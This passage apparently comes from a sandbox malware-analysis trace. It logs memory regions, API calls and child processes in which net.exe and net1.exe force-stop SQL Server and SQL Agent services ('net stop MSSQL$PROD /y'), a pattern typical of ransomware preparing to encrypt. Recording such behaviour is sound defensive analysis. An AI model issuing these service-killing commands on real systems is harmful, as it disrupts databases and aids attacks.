id = 13216 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13217 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 13218 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13219 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13220 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13221 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13222 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13223 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13224 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 13225 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13226 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13227 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13228 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13229 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13230 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13231 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13232 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13233 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13234 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13235 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13236 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13237 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13238 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13239 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13240 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13241 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 925 os_tid = 0x13c0 [0121.439] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afa30 | out: lpSystemTimeAsFileTime=0x1afa30*(dwLowDateTime=0xfd816c10, dwHighDateTime=0x1d48689)) [0121.439] GetCurrentProcessId () returned 0xd9c [0121.439] GetCurrentThreadId () returned 0x13c0 [0121.439] GetTickCount () returned 0x27ff8 [0121.440] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa38 | out: lpPerformanceCount=0x1afa38*=1816835800000) returned 1 [0121.440] GetModuleHandleW (lpModuleName=0x0) returned 0xff8a0000 [0121.440] __set_app_type (_Type=0x1) [0121.440] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8b9c9c) returned 0x0 [0121.441] __getmainargs (in: _Argc=0xff8c4780, _Argv=0xff8c4790, _Env=0xff8c4788, _DoWildCard=0, _StartInfo=0xff8c479c | out: _Argc=0xff8c4780, _Argv=0xff8c4790, _Env=0xff8c4788) returned 0 [0121.441] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.441] GetConsoleOutputCP () returned 0x1b5 [0121.476] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8ccec0 | out: lpCPInfo=0xff8ccec0) returned 1 [0121.477] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0121.478] sprintf_s (in: _DstBuf=0x1af9d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0121.479] setlocale (category=0, locale=".437") returned="English_United States.437" [0121.480] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0121.480] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0121.480] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$CITRIX_METAFRAME /y" [0121.480] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af770, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0121.480] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0121.480] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af9c8 | out: Buffer=0x1af9c8*=0x37c0f0) returned 0x0 [0121.480] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af9c8 | out: Buffer=0x1af9c8*=0x37c110) returned 0x0 [0121.480] _fileno (_File=0x7fefdba2a80) returned 0 [0121.480] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0121.481] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0121.481] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0121.481] _wcsicmp (_String1="config", _String2="stop") returned -16 [0121.481] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0121.481] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0121.481] _wcsicmp (_String1="file", _String2="stop") returned -13 [0121.481] _wcsicmp (_String1="files", _String2="stop") returned -13 [0121.481] _wcsicmp (_String1="group", _String2="stop") returned -12 [0121.481] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0121.481] _wcsicmp (_String1="help", _String2="stop") returned -11 [0121.481] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0121.481] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0121.481] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0121.481] _wcsicmp (_String1="session", _String2="stop") returned -15 [0121.481] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0121.481] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0121.481] _wcsicmp (_String1="share", _String2="stop") returned -12 [0121.481] _wcsicmp (_String1="start", _String2="stop") returned -14 [0121.481] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0121.481] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0121.481] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0121.481] _wcsicmp (_String1="accounts", _String2="SQLAgent$CITRIX_METAFRAME") returned -18 [0121.481] _wcsicmp (_String1="computer", _String2="SQLAgent$CITRIX_METAFRAME") returned -16 [0121.481] _wcsicmp (_String1="config", _String2="SQLAgent$CITRIX_METAFRAME") returned -16 [0121.481] _wcsicmp (_String1="continue", _String2="SQLAgent$CITRIX_METAFRAME") returned -16 [0121.481] _wcsicmp (_String1="cont", _String2="SQLAgent$CITRIX_METAFRAME") returned -16 [0121.481] _wcsicmp (_String1="file", _String2="SQLAgent$CITRIX_METAFRAME") returned -13 [0121.481] _wcsicmp (_String1="files", _String2="SQLAgent$CITRIX_METAFRAME") returned -13 [0121.481] _wcsicmp (_String1="group", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0121.481] _wcsicmp (_String1="groups", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0121.481] _wcsicmp (_String1="help", _String2="SQLAgent$CITRIX_METAFRAME") returned -11 [0121.481] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$CITRIX_METAFRAME") returned -11 [0121.481] _wcsicmp (_String1="localgroup", _String2="SQLAgent$CITRIX_METAFRAME") returned -7 [0121.481] _wcsicmp (_String1="pause", _String2="SQLAgent$CITRIX_METAFRAME") returned -3 [0121.481] _wcsicmp (_String1="session", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0121.482] _wcsicmp (_String1="sessions", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0121.482] _wcsicmp (_String1="sess", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0121.482] _wcsicmp (_String1="share", _String2="SQLAgent$CITRIX_METAFRAME") returned -9 [0121.482] _wcsicmp (_String1="start", _String2="SQLAgent$CITRIX_METAFRAME") returned 3 [0121.482] _wcsicmp (_String1="stats", _String2="SQLAgent$CITRIX_METAFRAME") returned 3 [0121.482] _wcsicmp (_String1="statistics", _String2="SQLAgent$CITRIX_METAFRAME") returned 3 [0121.482] _wcsicmp (_String1="stop", _String2="SQLAgent$CITRIX_METAFRAME") returned 3 [0121.482] _wcsicmp (_String1="time", _String2="SQLAgent$CITRIX_METAFRAME") returned 1 [0121.482] _wcsicmp (_String1="user", _String2="SQLAgent$CITRIX_METAFRAME") returned 2 [0121.482] _wcsicmp (_String1="users", _String2="SQLAgent$CITRIX_METAFRAME") returned 2 [0121.482] _wcsicmp (_String1="msg", _String2="SQLAgent$CITRIX_METAFRAME") returned -6 [0121.482] _wcsicmp (_String1="messenger", _String2="SQLAgent$CITRIX_METAFRAME") returned -6 [0121.482] _wcsicmp (_String1="receiver", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0121.482] _wcsicmp (_String1="rcv", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0121.482] _wcsicmp (_String1="netpopup", _String2="SQLAgent$CITRIX_METAFRAME") returned -5 [0121.482] _wcsicmp (_String1="redirector", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0121.482] _wcsicmp (_String1="redir", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0121.482] _wcsicmp (_String1="rdr", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0121.482] _wcsicmp (_String1="workstation", _String2="SQLAgent$CITRIX_METAFRAME") returned 4 [0121.482] _wcsicmp (_String1="work", _String2="SQLAgent$CITRIX_METAFRAME") returned 4 [0121.482] _wcsicmp (_String1="wksta", _String2="SQLAgent$CITRIX_METAFRAME") returned 4 [0121.482] _wcsicmp (_String1="prdr", _String2="SQLAgent$CITRIX_METAFRAME") returned -3 [0121.482] _wcsicmp (_String1="devrdr", _String2="SQLAgent$CITRIX_METAFRAME") returned -15 [0121.482] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$CITRIX_METAFRAME") returned -7 [0121.482] _wcsicmp (_String1="server", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0121.482] _wcsicmp (_String1="svr", _String2="SQLAgent$CITRIX_METAFRAME") returned 5 [0121.482] _wcsicmp (_String1="srv", _String2="SQLAgent$CITRIX_METAFRAME") returned 1 [0121.482] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$CITRIX_METAFRAME") returned -7 [0121.482] _wcsicmp (_String1="alerter", _String2="SQLAgent$CITRIX_METAFRAME") returned -18 [0121.482] _wcsicmp (_String1="netlogon", _String2="SQLAgent$CITRIX_METAFRAME") returned -5 [0121.482] _wcsupr (in: _String="SQLAgent$CITRIX_METAFRAME" | out: _String="SQLAGENT$CITRIX_METAFRAME") returned="SQLAGENT$CITRIX_METAFRAME" [0121.482] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x37ce20 [0121.486] GetServiceKeyNameW (in: hSCManager=0x37ce20, lpDisplayName="SQLAGENT$CITRIX_METAFRAME", lpServiceName=0xff8c5750, lpcchBuffer=0x1af8e8 | out: lpServiceName="", lpcchBuffer=0x1af8e8) returned 0 [0121.487] _wcsicmp (_String1="msg", _String2="SQLAGENT$CITRIX_METAFRAME") returned -6 [0121.487] _wcsicmp (_String1="messenger", _String2="SQLAGENT$CITRIX_METAFRAME") returned -6 [0121.487] _wcsicmp (_String1="receiver", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0121.487] _wcsicmp (_String1="rcv", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0121.487] _wcsicmp (_String1="redirector", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0121.487] _wcsicmp (_String1="redir", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0121.487] _wcsicmp (_String1="rdr", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0121.487] _wcsicmp (_String1="workstation", _String2="SQLAGENT$CITRIX_METAFRAME") returned 4 [0121.487] _wcsicmp (_String1="work", _String2="SQLAGENT$CITRIX_METAFRAME") returned 4 [0121.487] _wcsicmp (_String1="wksta", _String2="SQLAGENT$CITRIX_METAFRAME") returned 4 [0121.487] _wcsicmp (_String1="prdr", _String2="SQLAGENT$CITRIX_METAFRAME") returned -3 [0121.487] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$CITRIX_METAFRAME") returned -15 [0121.487] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$CITRIX_METAFRAME") returned -7 [0121.487] _wcsicmp (_String1="server", _String2="SQLAGENT$CITRIX_METAFRAME") returned -12 [0121.487] _wcsicmp (_String1="svr", _String2="SQLAGENT$CITRIX_METAFRAME") returned 5 [0121.487] _wcsicmp (_String1="srv", _String2="SQLAGENT$CITRIX_METAFRAME") returned 1 [0121.487] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$CITRIX_METAFRAME") returned -7 [0121.487] _wcsicmp (_String1="alerter", _String2="SQLAGENT$CITRIX_METAFRAME") returned -18 [0121.487] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$CITRIX_METAFRAME") returned -5 [0121.487] NetServiceControl (in: servername=0x0, service="SQLAGENT$CITRIX_METAFRAME", opcode=0x0, arg=0x0, bufptr=0x1af8f0 | out: bufptr=0x1af8f0) returned 0x889 [0121.488] wcscpy_s (in: _Destination=0xff8c80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0121.488] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0121.489] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8c5b50, nSize=0x800, Arguments=0xff8c7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0121.490] GetFileType (hFile=0xb) returned 0x2 [0121.491] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af7b8 | out: lpMode=0x1af7b8) returned 1 [0121.491] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8c5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af7b0, lpReserved=0x0 | out: lpBuffer=0xff8c5b50*, lpNumberOfCharsWritten=0x1af7b0*=0x1e) returned 1 [0121.491] GetFileType (hFile=0xb) returned 0x2 [0121.491] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af7b8 | out: lpMode=0x1af7b8) returned 1 [0121.491] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af7b0, lpReserved=0x0 | out: lpBuffer=0xff8a1efc*, lpNumberOfCharsWritten=0x1af7b0*=0x2) returned 1 [0121.492] _ultow (in: _Dest=0x889, _Radix=1767456 | out: _Dest=0x889) returned="2185" [0121.492] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8c5b50, nSize=0x800, Arguments=0xff8c7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0121.492] GetFileType (hFile=0xb) returned 0x2 [0121.492] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af7b8 | out: lpMode=0x1af7b8) returned 1 [0121.492] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8c5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af7b0, lpReserved=0x0 | out: lpBuffer=0xff8c5b50*, lpNumberOfCharsWritten=0x1af7b0*=0x34) returned 1 [0121.492] GetFileType (hFile=0xb) returned 0x2 [0121.493] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af7b8 | out: lpMode=0x1af7b8) returned 1 [0121.493] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af7b0, lpReserved=0x0 | out: lpBuffer=0xff8a1efc*, lpNumberOfCharsWritten=0x1af7b0*=0x2) returned 1 [0121.493] NetApiBufferFree (Buffer=0x37c0f0) returned 0x0 [0121.493] NetApiBufferFree (Buffer=0x37c110) returned 0x0 [0121.493] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$CITRIX_METAFRAME /y" [0121.493] exit (_Code=2) Process: id = "379" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x77b49000" os_pid = "0xd04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$PROD /y " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13242 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13243 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13244 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13245 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 13246 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13247 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13248 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13249 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13250 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13251 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13252 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13253 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13254 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13255 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13256 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 13257 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13258 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13259 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13260 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 926 os_tid = 0xed4 Process: id = "380" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x3676000" os_pid = "0x1180" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "373" os_parent_pid = "0xd68" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13261 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13262 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13263 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13264 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 13265 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13266 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13267 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13268 start_va = 0xffa30000 end_va = 0xffa62fff entry_point = 0xffa30000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13269 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13270 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13271 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 13272 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13273 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13274 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13275 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 13276 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13277 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13278 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13279 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13292 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13293 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 13294 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 13295 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13296 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13297 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13298 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13299 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13300 start_va = 